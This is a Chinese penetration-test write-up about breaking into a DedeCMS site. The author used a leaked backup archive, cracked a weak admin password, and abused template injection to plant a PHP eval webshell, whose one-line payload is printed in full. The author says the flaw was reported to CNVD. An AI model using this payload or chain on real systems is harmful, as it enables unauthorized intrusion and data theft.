标签：getshell field 源码 后台 php 泄露 模板

0x00 前言

此次渗透中的所有修改已经复原，且漏洞已经提交至cnvd平台

0x01 源码泄露

在一个月黑风高的夜晚，闲来无事的我又开着脚本利用hunter进行互联网站点源码的扫描

在查看备份文件扫描结果时，看到了宝贝

二话不说，访问下载得到源码！

可以在注释信息处发现dedecms的痕迹

0x02 敏感信息泄露

获得源码的第一步当然是获取敏感信息

先尝试全局搜索（crtl+shift+f）关键词

key
pwd
passwd
password

1.数据库信息泄露

2.后台管理员密码泄露

md5解密尝试解密，居然是一个弱口令

有了账户密码后当然是要找到后台管理地址，那么有了源码后台管理地址还不是手到擒来？

后台RCE->getshell

源码中找到后台地址（居然改了个888）

用泄露的admin/admin888进入后台后，发现版本信息为dedecms PS1

0x03 历史漏洞

既然已经获得了cms信息，第一步当然看看他的历史漏洞

查找SP1历史漏洞都是远程代码包含漏洞，但是这个站点已经将关键文件install.php删除（源码中不存在）

抱着侥幸心里又去尝试访问l一下（说不定后来又加上了呢）确实不存在，只能继续查看其他功能点

然后也尝试测试了许多SP2的漏洞payload但均失败

继续测试其他点

继续查看发现系统设置->系统基本参数->其他选项中有模板引擎的禁用函数

但是明明没有模板引擎功能他为什么要禁用呢？

我带着这个疑问又重新翻看源码

果然又找到模板相关文件，（说明只是功能点被隐藏，文件依旧还在）

尝试访问，成功访问到并且能够正常执行

那么就好办了，根据dedecms模板规则，后台模板写入payload，访问即可执行PHP代码

{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}
//调用方式 [field:字段名/] 这里的关键是runphp='yes'
//php代码则是简单的一句话

然后去将其他选项中的禁用函数全部删除保存

因为注入到了index.htm

所以连接webshell 的 url为首页

http://xxxxx:9890/index.php

成功getshell

本来还应该通过源码泄露得到的数据库账户密码尝试连接数据库的，但这里删shell跑路太急了就忘记了测了

0x04  总结

1.通过御剑目录扫描工具发现目标站点存在备份文件www.rar,对其下载到本地，进行源代码分析2.通过phpstorm打开源代码，尝试全局搜索（crtl+shift+f）关键词如：key,pwd,passwd,password，发现数据库的配置连接页面config.php，其中里面包含了数据库的用户名和密码以及地址。并且在注释信息处发现dedecms的痕迹3.并且在网站源码中搜索到数据库的备份文件，里面泄露了网站管理员的用户名和密码md5值4.通过md5对密码md5值进行解密，成功解密出密码为admin8885.通过源码分析发现后台路径为/admin888，通过解密出来的密码以及用户名，可成功登陆到网站后台。6.通过搜索dedecms的历史漏洞，发现目标站点都不能利用。7.查看系统设置->系统基本参数->其他选项中有模板引擎的禁用函数，都大多数被禁用了。8.搜索模板相关的文件(templets关键字）发现templets_main.php是存在模板文件，访问模板文件http://www.xxx.com/admin888/templets_main.php,可正常查看到。9.对模板库文件中的index.php进行修改，这里添加一句话木马{dede:field name='source' runphp='yes'}@eval($_POST['lyy']);{/dede:field}//调用方式 [field:字段名/] 这里的关键是runphp='yes'//php代码则是简单的一句话10.最后通过格拉斯连接一句话木马（http://www.xxx.com/index.php）
原文链接： https://xz.aliyun.com/t/10692

标签：getshell,field,源码,后台,php,泄露,模板
来源： https://www.cnblogs.com/backlion/p/15824611.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。